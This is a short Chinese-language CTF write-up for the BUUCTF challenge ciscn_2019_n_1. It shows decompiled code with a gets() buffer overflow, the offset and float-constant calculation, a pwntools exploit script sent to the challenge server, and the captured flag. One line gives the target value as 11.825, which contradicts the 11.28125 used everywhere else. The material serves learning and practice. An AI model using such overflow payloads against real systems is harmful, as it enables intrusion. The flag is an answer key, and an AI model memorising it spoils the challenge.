BUU-5-ciscn_2019_n_1
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ file ciscn_2019_n_1 ciscn_2019_n_1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=8a733f5404b1e2c65e1758c7d92821eb8490f7c5, not stripped
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ checksec lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ file ciscn_2019_n_1 usage: pwn checksec [-h] [--file [elf [elf ...]]] [elf [elf ...]] pwn checksec: error: argument elf: can't open 'lxl@lxl-vm:~/BUU/ciscn_2019_n_11$': [Errno 2] No such file or directory: 'lxl@lxl-vm:~/BUU/ciscn_2019_n_11$'
IDA 64
int __cdecl main(int argc, const char **argv, const char **envp) { FILE *v3; // rdi setvbuf(_bss_start, 0LL, 2, 0LL); v3 = stdin; setvbuf(stdin, 0LL, 2, 0LL); func(v3, 0LL); return 0; }
int func() { int result; // eax char v1; // [rsp+0h] [rbp-30h] float v2; // [rsp+2Ch] [rbp-4h] v2 = 0.0; puts("Let's guess the number."); gets(&v1); if ( v2 == 11.28125 ) result = system("cat /flag"); else result = puts("Its value should be 11.28125"); return result; }
gets可溢出,可以用v1覆盖v2的值,执行system(“cat /flag”)获取flag(初步想法)
很显然,我们只需要让v2等于11.825就可以
我们能控制的是v1,位置在rbp-30h
而v2的位置在rbp-4h
所以覆盖量为0x30-0x4=0x2c
有一个问题是,浮点数不能直接转换成字符串str(11.28125),需要找到11.28125在程序中的表示41348000h
.rodata:00000000004007D6 aItsValueShould db 'Its value should be 11.28125',0 .rodata:00000000004007D6 ; DATA XREF: func:loc_4006CF↑o .rodata:00000000004007F3 align 4 .rodata:00000000004007F4 dword_4007F4 dd 41348000h ; DATA XREF: func+31↑r .rodata:00000000004007F4 ; func+3F↑r .rodata:00000000004007F4 _rodata ends
EXP
from pwn import * p=remote('node3.buuoj.cn',28677) payload='a'*0x2c+p64(0x41348000) p.sendline(payload) p.interactive()
lxl@lxl-vm:~/BUU/ciscn_2019_n_11$ python ciscn_2019_n_1.py [+] Opening connection to node3.buuoj.cn on port 28677: Done [*] Switching to interactive mode Let's guess the number. flag{1d8f29c1-3618-4f4e-89fc-bdd4e4bc5e59} [*] Got EOF while reading in interactive $
flag{1d8f29c1-3618-4f4e-89fc-bdd4e4bc5e59}